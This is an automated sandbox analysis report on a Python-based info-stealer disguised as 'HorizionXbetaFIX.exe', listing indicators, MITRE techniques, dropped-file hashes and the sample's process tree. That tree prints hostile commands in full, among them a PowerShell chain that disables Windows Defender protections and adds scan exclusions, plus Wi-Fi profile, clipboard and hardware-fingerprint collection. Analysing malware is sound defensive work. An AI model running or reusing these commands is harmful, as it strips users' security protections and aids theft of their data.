707df1515ab62e28470f1999946e7483abb5a41a4f5ac165871f56c47dc6b6a6

Analysis

max time kernel
149s
max time network
152s
platform
windows10-2004_x64
resource
win10v2004-20240412-en
resource tags

arch:x64arch:x86image:win10v2004-20240412-enlocale:en-usos:windows10-2004-x64system
submitted
24-04-2024 15:40

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

HorizionXbetaFIX.exe
Size

30.0MB
MD5

e3e408b7aaf6e1b6e41e4725ee03ec76
SHA1

34f9797389b574ddef7373770795f5f001e63263
SHA256

707df1515ab62e28470f1999946e7483abb5a41a4f5ac165871f56c47dc6b6a6
SHA512

6e905cf221184826cbcd44a7c2b20550662437c7fdea5566dddab24f48319fe086d6054d84824fae00f68ba18c3e00cef90ed942c2aacd698895348388094cd3
SSDEEP

393216:tv9zcQq08AUh2Jp5MPL+9qzTqSJHU1JfjJ+7j6dpdkqYv1:p9gQwhZ+9qHqSJHU1xj2q0qE

Score

7^/10

spyware stealer upx

Malware Config

Signatures

Drops startup file 2 IoCs

Processes:

HorizionXbetaFIX.exe

description	ioc	process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HorizionXbetaFIX.exe	HorizionXbetaFIX.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HorizionXbetaFIX.exe	HorizionXbetaFIX.exe

Loads dropped DLL 52 IoCs

Processes:

HorizionXbetaFIX.exe

pid	process
4332	HorizionXbetaFIX.exe
4332	HorizionXbetaFIX.exe
4332	HorizionXbetaFIX.exe
4332	HorizionXbetaFIX.exe
4332	HorizionXbetaFIX.exe
4332	HorizionXbetaFIX.exe
4332	HorizionXbetaFIX.exe
4332	HorizionXbetaFIX.exe
4332	HorizionXbetaFIX.exe
4332	HorizionXbetaFIX.exe
4332	HorizionXbetaFIX.exe
4332	HorizionXbetaFIX.exe
4332	HorizionXbetaFIX.exe
4332	HorizionXbetaFIX.exe
4332	HorizionXbetaFIX.exe
4332	HorizionXbetaFIX.exe
4332	HorizionXbetaFIX.exe
4332	HorizionXbetaFIX.exe
4332	HorizionXbetaFIX.exe
4332	HorizionXbetaFIX.exe
4332	HorizionXbetaFIX.exe
4332	HorizionXbetaFIX.exe
4332	HorizionXbetaFIX.exe
4332	HorizionXbetaFIX.exe
4332	HorizionXbetaFIX.exe
4332	HorizionXbetaFIX.exe
4332	HorizionXbetaFIX.exe
4332	HorizionXbetaFIX.exe
4332	HorizionXbetaFIX.exe
4332	HorizionXbetaFIX.exe
4332	HorizionXbetaFIX.exe
4332	HorizionXbetaFIX.exe
4332	HorizionXbetaFIX.exe
4332	HorizionXbetaFIX.exe
4332	HorizionXbetaFIX.exe
4332	HorizionXbetaFIX.exe
4332	HorizionXbetaFIX.exe
4332	HorizionXbetaFIX.exe
4332	HorizionXbetaFIX.exe
4332	HorizionXbetaFIX.exe
4332	HorizionXbetaFIX.exe
4332	HorizionXbetaFIX.exe
4332	HorizionXbetaFIX.exe
4332	HorizionXbetaFIX.exe
4332	HorizionXbetaFIX.exe
4332	HorizionXbetaFIX.exe
4332	HorizionXbetaFIX.exe
4332	HorizionXbetaFIX.exe
4332	HorizionXbetaFIX.exe
4332	HorizionXbetaFIX.exe
4332	HorizionXbetaFIX.exe
4332	HorizionXbetaFIX.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

UPX packed file 64 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\_MEI47642\python311.dll	upx
behavioral2/memory/4332-107-0x00007FFF79480000-0x00007FFF79A6E000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\_MEI47642\_ctypes.pyd	upx
behavioral2/memory/4332-117-0x00007FFF8CCB0000-0x00007FFF8CCD4000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\_MEI47642\_bz2.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI47642\libffi-8.dll	upx
C:\Users\Admin\AppData\Local\Temp\_MEI47642\_socket.pyd	upx
behavioral2/memory/4332-140-0x00007FFF8CC90000-0x00007FFF8CCA9000-memory.dmp	upx
behavioral2/memory/4332-142-0x00007FFF896A0000-0x00007FFF896CD000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\_MEI47642\pyexpat.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI47642\_ssl.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI47642\_sqlite3.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI47642\_queue.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI47642\_overlapped.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI47642\_multiprocessing.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI47642\_hashlib.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI47642\_decimal.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI47642\_cffi_backend.cp311-win_amd64.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI47642\_asyncio.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI47642\unicodedata.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI47642\sqlite3.dll	upx
C:\Users\Admin\AppData\Local\Temp\_MEI47642\select.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI47642\libssl-3.dll	upx
C:\Users\Admin\AppData\Local\Temp\_MEI47642\libcrypto-3.dll	upx
C:\Users\Admin\AppData\Local\Temp\_MEI47642\_lzma.pyd	upx
behavioral2/memory/4332-120-0x00007FFF92430000-0x00007FFF9243F000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\_MEI47642\pywin32_system32\pythoncom311.dll	upx
behavioral2/memory/4332-152-0x00007FFF89A90000-0x00007FFF89A9D000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\_MEI47642\win32\win32api.pyd	upx
behavioral2/memory/4332-155-0x00007FFF89500000-0x00007FFF895BC000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\_MEI47642\pywin32_system32\pywintypes311.dll	upx
behavioral2/memory/4332-147-0x00007FFF89660000-0x00007FFF89696000-memory.dmp	upx
behavioral2/memory/4332-156-0x00007FFF8CC70000-0x00007FFF8CC89000-memory.dmp	upx
behavioral2/memory/4332-158-0x00007FFF89630000-0x00007FFF8965E000-memory.dmp	upx
behavioral2/memory/4332-159-0x00007FFF89600000-0x00007FFF8962B000-memory.dmp	upx
behavioral2/memory/4332-157-0x00007FFF89AB0000-0x00007FFF89ABD000-memory.dmp	upx
behavioral2/memory/4332-161-0x00007FFF7A820000-0x00007FFF7A853000-memory.dmp	upx
behavioral2/memory/4332-165-0x00007FFF78E90000-0x00007FFF78F5D000-memory.dmp	upx
behavioral2/memory/4332-170-0x00007FFF87CA0000-0x00007FFF87CB2000-memory.dmp	upx
behavioral2/memory/4332-173-0x00007FFF78710000-0x00007FFF78886000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\_MEI47642\psutil\_psutil_windows.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI47642\zstandard\backend_c.cp311-win_amd64.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI47642\charset_normalizer\md__mypyc.cp311-win_amd64.pyd	upx
behavioral2/memory/4332-185-0x00007FFF7FFC0000-0x00007FFF7FFE3000-memory.dmp	upx
behavioral2/memory/4332-186-0x00007FFF78680000-0x00007FFF78707000-memory.dmp	upx
behavioral2/memory/4332-189-0x00007FFF892E0000-0x00007FFF892EB000-memory.dmp	upx
behavioral2/memory/4332-190-0x00007FFF7A730000-0x00007FFF7A756000-memory.dmp	upx
behavioral2/memory/4332-187-0x00007FFF7A760000-0x00007FFF7A774000-memory.dmp	upx
behavioral2/memory/4332-194-0x00007FFF88780000-0x00007FFF8878C000-memory.dmp	upx
behavioral2/memory/4332-193-0x00007FFF88BC0000-0x00007FFF88BCB000-memory.dmp	upx
behavioral2/memory/4332-195-0x00007FFF88170000-0x00007FFF8817B000-memory.dmp	upx
behavioral2/memory/4332-196-0x00007FFF7FFF0000-0x00007FFF7FFFC000-memory.dmp	upx
behavioral2/memory/4332-192-0x00007FFF89290000-0x00007FFF8929C000-memory.dmp	upx
behavioral2/memory/4332-191-0x00007FFF78320000-0x00007FFF7843C000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\_MEI47642\charset_normalizer\md.cp311-win_amd64.pyd	upx
behavioral2/memory/4332-174-0x00007FFF886A0000-0x00007FFF886B5000-memory.dmp	upx
behavioral2/memory/4332-166-0x00007FFF78960000-0x00007FFF78E82000-memory.dmp	upx
behavioral2/memory/4332-197-0x00007FFF7FA10000-0x00007FFF7FA1E000-memory.dmp	upx
behavioral2/memory/4332-200-0x00007FFF7A4F0000-0x00007FFF7A4FB000-memory.dmp	upx
behavioral2/memory/4332-201-0x00007FFF7A4E0000-0x00007FFF7A4EB000-memory.dmp	upx
behavioral2/memory/4332-198-0x00007FFF7A500000-0x00007FFF7A50C000-memory.dmp	upx
behavioral2/memory/4332-202-0x00007FFF7A4C0000-0x00007FFF7A4CC000-memory.dmp	upx
behavioral2/memory/4332-211-0x00007FFF79E50000-0x00007FFF79E5C000-memory.dmp	upx
behavioral2/memory/4332-209-0x00007FFF79E60000-0x00007FFF79E72000-memory.dmp	upx

Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs

Web Service
T1102

Processes:

flow ioc

52 discord.com
15 raw.githubusercontent.com
17 raw.githubusercontent.com
39 discord.com
40 discord.com
51 discord.com
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

49 api.ipify.org
46 api.ipify.org
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.

System Information Discovery
T1082

Processes:

WMIC.exe

pid process

4468 WMIC.exe

flow	ioc
52	discord.com
15	raw.githubusercontent.com
17	raw.githubusercontent.com
39	discord.com
40	discord.com
51	discord.com

flow	ioc
49	api.ipify.org
46	api.ipify.org

pid	process
4468	WMIC.exe

Suspicious behavior: EnumeratesProcesses 16 IoCs

Processes:

HorizionXbetaFIX.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
4332	HorizionXbetaFIX.exe
4332	HorizionXbetaFIX.exe
4332	HorizionXbetaFIX.exe
4332	HorizionXbetaFIX.exe
4324	powershell.exe
4324	powershell.exe
4740	powershell.exe
4740	powershell.exe
4100	powershell.exe
4100	powershell.exe
2192	powershell.exe
2192	powershell.exe
2192	powershell.exe
568	powershell.exe
568	powershell.exe
568	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

HorizionXbetaFIX.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeWMIC.exewmic.exe

description	pid	process
Token: SeDebugPrivilege	4332	HorizionXbetaFIX.exe
Token: SeDebugPrivilege	4324	powershell.exe
Token: SeDebugPrivilege	4740	powershell.exe
Token: SeDebugPrivilege	4100	powershell.exe
Token: SeDebugPrivilege	2192	powershell.exe
Token: SeDebugPrivilege	568	powershell.exe
Token: SeIncreaseQuotaPrivilege	4604	WMIC.exe
Token: SeSecurityPrivilege	4604	WMIC.exe
Token: SeTakeOwnershipPrivilege	4604	WMIC.exe
Token: SeLoadDriverPrivilege	4604	WMIC.exe
Token: SeSystemProfilePrivilege	4604	WMIC.exe
Token: SeSystemtimePrivilege	4604	WMIC.exe
Token: SeProfSingleProcessPrivilege	4604	WMIC.exe
Token: SeIncBasePriorityPrivilege	4604	WMIC.exe
Token: SeCreatePagefilePrivilege	4604	WMIC.exe
Token: SeBackupPrivilege	4604	WMIC.exe
Token: SeRestorePrivilege	4604	WMIC.exe
Token: SeShutdownPrivilege	4604	WMIC.exe
Token: SeDebugPrivilege	4604	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4604	WMIC.exe
Token: SeRemoteShutdownPrivilege	4604	WMIC.exe
Token: SeUndockPrivilege	4604	WMIC.exe
Token: SeManageVolumePrivilege	4604	WMIC.exe
Token: 33	4604	WMIC.exe
Token: 34	4604	WMIC.exe
Token: 35	4604	WMIC.exe
Token: 36	4604	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4604	WMIC.exe
Token: SeSecurityPrivilege	4604	WMIC.exe
Token: SeTakeOwnershipPrivilege	4604	WMIC.exe
Token: SeLoadDriverPrivilege	4604	WMIC.exe
Token: SeSystemProfilePrivilege	4604	WMIC.exe
Token: SeSystemtimePrivilege	4604	WMIC.exe
Token: SeProfSingleProcessPrivilege	4604	WMIC.exe
Token: SeIncBasePriorityPrivilege	4604	WMIC.exe
Token: SeCreatePagefilePrivilege	4604	WMIC.exe
Token: SeBackupPrivilege	4604	WMIC.exe
Token: SeRestorePrivilege	4604	WMIC.exe
Token: SeShutdownPrivilege	4604	WMIC.exe
Token: SeDebugPrivilege	4604	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4604	WMIC.exe
Token: SeRemoteShutdownPrivilege	4604	WMIC.exe
Token: SeUndockPrivilege	4604	WMIC.exe
Token: SeManageVolumePrivilege	4604	WMIC.exe
Token: 33	4604	WMIC.exe
Token: 34	4604	WMIC.exe
Token: 35	4604	WMIC.exe
Token: 36	4604	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3216	wmic.exe
Token: SeSecurityPrivilege	3216	wmic.exe
Token: SeTakeOwnershipPrivilege	3216	wmic.exe
Token: SeLoadDriverPrivilege	3216	wmic.exe
Token: SeSystemProfilePrivilege	3216	wmic.exe
Token: SeSystemtimePrivilege	3216	wmic.exe
Token: SeProfSingleProcessPrivilege	3216	wmic.exe
Token: SeIncBasePriorityPrivilege	3216	wmic.exe
Token: SeCreatePagefilePrivilege	3216	wmic.exe
Token: SeBackupPrivilege	3216	wmic.exe
Token: SeRestorePrivilege	3216	wmic.exe
Token: SeShutdownPrivilege	3216	wmic.exe
Token: SeDebugPrivilege	3216	wmic.exe
Token: SeSystemEnvironmentPrivilege	3216	wmic.exe
Token: SeRemoteShutdownPrivilege	3216	wmic.exe
Token: SeUndockPrivilege	3216	wmic.exe

Suspicious use of WriteProcessMemory 40 IoCs

Processes:

HorizionXbetaFIX.exeHorizionXbetaFIX.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exe

description	pid	process	target process
PID 4764 wrote to memory of 4332	4764	HorizionXbetaFIX.exe	HorizionXbetaFIX.exe
PID 4764 wrote to memory of 4332	4764	HorizionXbetaFIX.exe	HorizionXbetaFIX.exe
PID 4332 wrote to memory of 2916	4332	HorizionXbetaFIX.exe	cmd.exe
PID 4332 wrote to memory of 2916	4332	HorizionXbetaFIX.exe	cmd.exe
PID 4332 wrote to memory of 2576	4332	HorizionXbetaFIX.exe	cmd.exe
PID 4332 wrote to memory of 2576	4332	HorizionXbetaFIX.exe	cmd.exe
PID 4332 wrote to memory of 4956	4332	HorizionXbetaFIX.exe	cmd.exe
PID 4332 wrote to memory of 4956	4332	HorizionXbetaFIX.exe	cmd.exe
PID 2576 wrote to memory of 2688	2576	cmd.exe	netsh.exe
PID 2576 wrote to memory of 2688	2576	cmd.exe	netsh.exe
PID 4956 wrote to memory of 4324	4956	cmd.exe	powershell.exe
PID 4956 wrote to memory of 4324	4956	cmd.exe	powershell.exe
PID 4332 wrote to memory of 1960	4332	HorizionXbetaFIX.exe	cmd.exe
PID 4332 wrote to memory of 1960	4332	HorizionXbetaFIX.exe	cmd.exe
PID 1960 wrote to memory of 4740	1960	cmd.exe	powershell.exe
PID 1960 wrote to memory of 4740	1960	cmd.exe	powershell.exe
PID 1960 wrote to memory of 4100	1960	cmd.exe	powershell.exe
PID 1960 wrote to memory of 4100	1960	cmd.exe	powershell.exe
PID 1960 wrote to memory of 2192	1960	cmd.exe	powershell.exe
PID 1960 wrote to memory of 2192	1960	cmd.exe	powershell.exe
PID 1960 wrote to memory of 568	1960	cmd.exe	powershell.exe
PID 1960 wrote to memory of 568	1960	cmd.exe	powershell.exe
PID 4332 wrote to memory of 1376	4332	HorizionXbetaFIX.exe	cmd.exe
PID 4332 wrote to memory of 1376	4332	HorizionXbetaFIX.exe	cmd.exe
PID 1376 wrote to memory of 4604	1376	cmd.exe	WMIC.exe
PID 1376 wrote to memory of 4604	1376	cmd.exe	WMIC.exe
PID 4332 wrote to memory of 3216	4332	HorizionXbetaFIX.exe	wmic.exe
PID 4332 wrote to memory of 3216	4332	HorizionXbetaFIX.exe	wmic.exe
PID 4332 wrote to memory of 4880	4332	HorizionXbetaFIX.exe	cmd.exe
PID 4332 wrote to memory of 4880	4332	HorizionXbetaFIX.exe	cmd.exe
PID 4880 wrote to memory of 4468	4880	cmd.exe	WMIC.exe
PID 4880 wrote to memory of 4468	4880	cmd.exe	WMIC.exe
PID 4332 wrote to memory of 3916	4332	HorizionXbetaFIX.exe	cmd.exe
PID 4332 wrote to memory of 3916	4332	HorizionXbetaFIX.exe	cmd.exe
PID 3916 wrote to memory of 3884	3916	cmd.exe	WMIC.exe
PID 3916 wrote to memory of 3884	3916	cmd.exe	WMIC.exe
PID 4332 wrote to memory of 2616	4332	HorizionXbetaFIX.exe	cmd.exe
PID 4332 wrote to memory of 2616	4332	HorizionXbetaFIX.exe	cmd.exe
PID 2616 wrote to memory of 4100	2616	cmd.exe	WMIC.exe
PID 2616 wrote to memory of 4100	2616	cmd.exe	WMIC.exe

C:\Users\Admin\AppData\Local\Temp\HorizionXbetaFIX.exe
"C:\Users\Admin\AppData\Local\Temp\HorizionXbetaFIX.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4764

C:\Users\Admin\AppData\Local\Temp\HorizionXbetaFIX.exe
"C:\Users\Admin\AppData\Local\Temp\HorizionXbetaFIX.exe"
2⤵
- Drops startup file
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4332

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "ver"
3⤵
PID:2916

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"
3⤵
- Suspicious use of WriteProcessMemory
PID:2576

C:\Windows\system32\netsh.exe
netsh wlan show profiles
4⤵
PID:2688

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
3⤵
- Suspicious use of WriteProcessMemory
PID:4956

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4324

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\AppData" & powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\Local" & powershell.exe -command "Set-MpPreference -ExclusionExtension '.exe'" "
3⤵
- Suspicious use of WriteProcessMemory
PID:1960

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4740

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\Admin\AppData"
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4100

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\Admin\Local"
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2192

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -ExclusionExtension '.exe'"
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:568

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic os get Caption"
3⤵
- Suspicious use of WriteProcessMemory
PID:1376

C:\Windows\System32\Wbem\WMIC.exe
wmic os get Caption
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:4604

C:\Windows\System32\Wbem\wmic.exe
wmic cpu get Name
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3216

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
3⤵
- Suspicious use of WriteProcessMemory
PID:4880

C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
4⤵
- Detects videocard installed
PID:4468

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
3⤵
- Suspicious use of WriteProcessMemory
PID:3916

C:\Windows\System32\Wbem\WMIC.exe
wmic computersystem get totalphysicalmemory
4⤵
PID:3884

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\\Windows\\System32\\wbem\\WMIC.exe csproduct get uuid"
3⤵
- Suspicious use of WriteProcessMemory
PID:2616

C:\Windows\System32\wbem\WMIC.exe
C:\\Windows\\System32\\wbem\\WMIC.exe csproduct get uuid
4⤵
PID:4100

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Web Service

T1102

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\_MEI47642\VCRUNTIME140.dll
Filesize
116KB

MD5
be8dbe2dc77ebe7f88f910c61aec691a

SHA1
a19f08bb2b1c1de5bb61daf9f2304531321e0e40

SHA256
4d292623516f65c80482081e62d5dadb759dc16e851de5db24c3cbb57b87db83

SHA512
0da644472b374f1da449a06623983d0477405b5229e386accadb154b43b8b083ee89f07c3f04d2c0c7501ead99ad95aecaa5873ff34c5eeb833285b598d5a655

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI47642\VCRUNTIME140_1.dll
Filesize
48KB

MD5
f8dfa78045620cf8a732e67d1b1eb53d

SHA1
ff9a604d8c99405bfdbbf4295825d3fcbc792704

SHA256
a113f192195f245f17389e6ecbed8005990bcb2476ddad33f7c4c6c86327afe5

SHA512
ba7f8b7ab0deb7a7113124c28092b543e216ca08d1cf158d9f40a326fb69f4a2511a41a59ea8482a10c9ec4ec8ac69b70dfe9ca65e525097d93b819d498da371

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI47642\_asyncio.pyd
Filesize
36KB

MD5
175700fdf830363d7abf41f83f5118d8

SHA1
0f2be2078f414ffd15f003913593a4f776d0fa85

SHA256
28444204cec80cb5b713ae58578dd3522ba9cd271a91079988cd4193db75fa8a

SHA512
4353dad4137ef3f2654a949c99395182051d74b8b1d54c6c7bb2485709a85bca6bb820969cf3fb215e686a0d16fd5cb52366376e30efd81988202cccf868a40a

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI47642\_bz2.pyd
Filesize
48KB

MD5
e2c477b849154e0172857b3ac1ee3d86

SHA1
08b9089cb5dbd4f1f65607fad842674389a79ed9

SHA256
a58958e5edfa837f9da608b9eb22ad0c4c8f6a3ebc8ff04ef6f3be161f56d069

SHA512
f09243fdb6933eae7f4d1cb8b80d914d5c24975cbad8e03a6549e7f187309304ec505732934fd4221a8058877557c7568e41faca57f5032506596abad0c79586

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI47642\_cffi_backend.cp311-win_amd64.pyd
Filesize
71KB

MD5
55ce382885e748cdc4b567eccf3322e7

SHA1
88a041792b248b038fdd68cf8200a5ee6de30e12

SHA256
d76ccd558721ac80f8215f4e03ad2d49773b3e6aa29aaa01aaf006d9e7f51470

SHA512
5f3442b8fdde917f351eb0cf72cf3ae7e45ec4eea74b89bf937f4f2601582ddc5a3c865a70162344f542f877a2e6f7ac8cdbf5fb1dbface560a6992c350c2f4b

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI47642\_ctypes.pyd
Filesize
58KB

MD5
3b537491b8e1b715b42713bd39b1d8a0

SHA1
59a275be3a8c1d3271a766607fbdb3d19bbdc7c0

SHA256
cf8c30616997222cdd3562e4ca3a8012c8275a0afc0f1514aeaeb3d6ccb7f025

SHA512
6193f91dc0daabf9ec6591e71c76e1587571e4809182c52815cac678bdb5d58d78ec637cf265ae98c8a604fe000165675a94cab4c39742d13c2450bc84e187f1

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI47642\_decimal.pyd
Filesize
106KB

MD5
8b7c775fd219b5387aa04316a19dc996

SHA1
ae12bdf7bebb53048d61625bdecef9349dfb6079

SHA256
9f12be54223f203672da082de5ac60c33e506a307cc136b52ca5a259af759d51

SHA512
014d801ece4318eeddacdf8d07c394a94c548dcffaf28528386f80e849001c3f45f90e3ab432a7ab601496eb30f849f101bbec7f2055d512b819721038b08963

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI47642\_hashlib.pyd
Filesize
35KB

MD5
653c25f88e513480415057a4a572aeed

SHA1
f654aaf661964df51db34de49a53c8f76cac2d8d

SHA256
5be45c9de69b388b900fd17525c047569273e71c47b00b4a1531f3741e3ab699

SHA512
dd887042b9c3880c95cfa0ba35f6ed26be294cd75fc3b758f47f4671a33c72f9efdfb9152eb3a65dbb9366b5ecbe01b5140aedc182f352ee113fcfc5213e526b

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI47642\_lzma.pyd
Filesize
86KB

MD5
cc65d1bc9ae05531e3133bde291b9935

SHA1
f8c3f598558d4fb81567497534eedb80aa36ed05

SHA256
7495562061ed6cf4a91b2d147babcb3235cee3b75ac94972852498720fb560a7

SHA512
4bf4d27a1d061a230489eb8c1fc0bbc7432a4c2b711ab0ce8ff9ac1f0aa1402f285979408ec8c765343ea793ad534421bbe785c9fbdf7afe34a1d19ac3955fc3

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI47642\_multiprocessing.pyd
Filesize
26KB

MD5
28d1fcc7077f724c7382561e8a08341b

SHA1
af9111e34cceae89240853e9f6d2ea9b12f59172

SHA256
a020a37e0b00fc314ccccb550f0825cf87814e6eedc30d931ce105cdedc38c95

SHA512
782fd35a6a2f3401ae920eb6007b3afdac60c2b0212ba3677a948d2a62f83f1536ec6a2a63f65806d68173c7e41cabc830d3a216b0a1cbebd20d153cfb4e2ff4

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI47642\_overlapped.pyd
Filesize
32KB

MD5
712907b30b62f30e6f6b1ad7e63e9a85

SHA1
60b14b19b5909348ddac8bd5450c6822730c9d15

SHA256
8782bb95bae2f2db8d5f6359447c25c05b1fad9dbd331e6a3de097479bbe531a

SHA512
bd45aa6777c0d61b47d3811e7d64a546729893667236b02655dfe58b8155ac68f868a2c0cc7b38d2c9a62125e79bacdff31b7380e7748ea94112f7d87eb79103

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI47642\_queue.pyd
Filesize
25KB

MD5
237b8472822f8eacb787044a3daf5c6e

SHA1
97e72d1582b66028199805ab086419e333b35f55

SHA256
a119c05628a8dcff1e5d78fd9fe2c5c2e917296fa8aa7c5691afb41cc1d5d384

SHA512
b1ec2d48607bc7859718591aa25d234aba59a1030c898cdca81d4cb3db8fb5e20ceb4803f757aa7eb591db7f15cbdea91b32e4228910322580b90801dceb15aa

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI47642\_socket.pyd
Filesize
43KB

MD5
d91c29b10936ed573812d6bc0ff4aba7

SHA1
d7b04f577c644cf5ce62fb72d3c77a55ef325a01

SHA256
3d0b6344828ed5a4214fbaa423dffd078f34d7e939f1bcdd17c477a4f38c1190

SHA512
ce97994f90b5b5dfe3987a92f56e80ceb1e0c96a89ac788876800a98a78d809f201411b30d429be21e230e17223f7132bc2ac8d6b17a53773ad832c89cc4a4a3

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI47642\_sqlite3.pyd
Filesize
56KB

MD5
0ce73abe151c541d57e21f56fa8a162d

SHA1
028c363dd8b7d70dcb95925e5612ccfbd39f020d

SHA256
a05ccc2f9a6ccbe17866650b14f6b61fa1ddb18c9bdb9e635b126926d1dd7b3e

SHA512
8a6a91103013bc17fcc4d0ca02160f47d37b590b875f981e499247bf840ba9e5cb644595e79f5a225b0f63ba8bd27b51b3effe675af5fabf93a6e3e0e4221e77

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI47642\_ssl.pyd
Filesize
65KB

MD5
0996c0b2ec2a512fa88cee1651dd6640

SHA1
a913db52c1a269f8115e06723ae9f25857afd2b3

SHA256
72caa24b38a6b2600774aac19ecbdc7921bf1e129be3767a506cef0ab9d01af8

SHA512
